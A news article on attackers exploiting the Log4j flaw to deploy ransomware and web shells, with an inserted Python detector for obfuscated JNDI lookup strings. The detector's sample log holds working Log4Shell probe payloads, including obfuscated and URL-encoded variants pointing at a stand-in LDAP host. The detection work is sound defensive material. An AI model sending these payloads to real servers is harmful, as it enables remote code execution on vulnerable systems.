Threat actors, including at least one nation-state actor, are attempting to exploit the newly disclosed Log4j flaw (tracked as CVE-2021-44228) to deploy ransomware, remote access Trojans, and Web shells on vulnerable systems. All the while, organizations continue to download versions of the logging library that contain the vulnerability.
This new attack activity represents an escalation of sorts from attackers' initial exploitation attempts, which mainly focused on dropping cryptocurrency mining tools and compromising systems with the goal of adding them to a botnet. Targeted systems include servers, virtual machines, PCs, and IP cameras.
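The exploitation attempts described above arrive as Log4j lookup strings in any request field that ends up in a log line (User-Agent, URL, headers), and attackers nest Log4j's own lookups to get past a naive search for "${jndi:". The following Python is an added example, not code from the article, from CrowdStrike, or from the Apache project: it unwraps URL-encoding and the common nesting tricks (${lower:...}, ${upper:...}, and the ${name:-default} form) before matching, which is closer to what Log4j itself evaluates. The access-log lines are constructed for the example, and 198.51.100.7 is a documentation address.

```python
import re
from urllib.parse import unquote

# Obfuscation layers that Log4j 2.x resolves before the JNDI lookup fires.
# Each is rewritten to the literal text Log4j would evaluate it to.
_DEFAULT_VALUE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")          # ${env:NONE:-j} -> j, ${::-j} -> j
_LOWER = re.compile(r"\$\{\s*lower:([^${}]*)\}", re.IGNORECASE)   # ${lower:J} -> j
_UPPER = re.compile(r"\$\{\s*upper:([^${}]*)\}", re.IGNORECASE)   # ${upper:j} -> J
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)             # the lookup that triggers the flaw


def normalize(text: str, max_rounds: int = 10) -> str:
    """Undo URL-encoding and nested lookup obfuscation until the text stops changing."""
    for _ in range(max_rounds):
        before = text
        text = unquote(text)
        # Innermost lookups first: the patterns exclude '${' so nesting unwinds one layer per pass.
        text = _DEFAULT_VALUE.sub(lambda m: m.group(1), text)
        text = _LOWER.sub(lambda m: m.group(1).lower(), text)
        text = _UPPER.sub(lambda m: m.group(1).upper(), text)
        if text == before:
            break
    return text


def is_log4shell_probe(text: str) -> bool:
    """True if the text, once de-obfuscated, contains a JNDI lookup."""
    return _JNDI.search(normalize(text)) is not None


def scan_access_log(lines):
    """Return (line_number, normalized_line) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalize(line)
        if _JNDI.search(norm):
            hits.append((n, norm))
    return hits


# Constructed sample: one benign request, three probe styles, one benign '${' false-positive candidate.
SAMPLE_LOG = [
    '10.0.0.5 - - [13/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [13/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.7 - - [13/Dec/2021:10:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://198.51.100.7:1389/a}"',
    '10.0.0.8 - - [13/Dec/2021:10:00:04 +0000] '
    '"GET /?x=%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2F198.51.100.7%3A1389%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.79"',
    '10.0.0.9 - - [13/Dec/2021:10:00:05 +0000] "GET /?q=${date:YYYY} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, norm in scan_access_log(SAMPLE_LOG):
        print(f"line {n}: {norm}")
```

The last sample line shows a design choice: this detector only flags JNDI lookups, so a stray "${date:YYYY}" is not reported. During an active campaign many teams prefer to alert on any "${" in request data at all, which is cheaper and catches lookup families not modelled here, at the cost of more noise.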
CrowdStrike on Tuesday said it has observed a nation-state actor make moves that suggest an interest in exploiting the flaw.
"CrowdStrike Intelligence has observed state-sponsored actor NEMESIS KITTEN -- based out of Iran -- newly deploy into a server a class file that could be triggered by Log4j," says Adam Meyers, senior vice president of intelligence at CrowdStrike. "The timing, intent, and capability are consistent with what would be the adversary attempting to exploit Log4j," he adds. Meyers describes NEMESIS KITTEN as an adversary that has previously been engaged in both disruptive and destructive attacks.
The latest developments heighten the urgency for organizations to update to the fixed version of the Log4j logging framework that the Apache Software Foundation released Dec. 10 (Log4j 2.15.0), or, where an immediate upgrade is not possible, to apply the mitigations it has recommended, security experts said this week.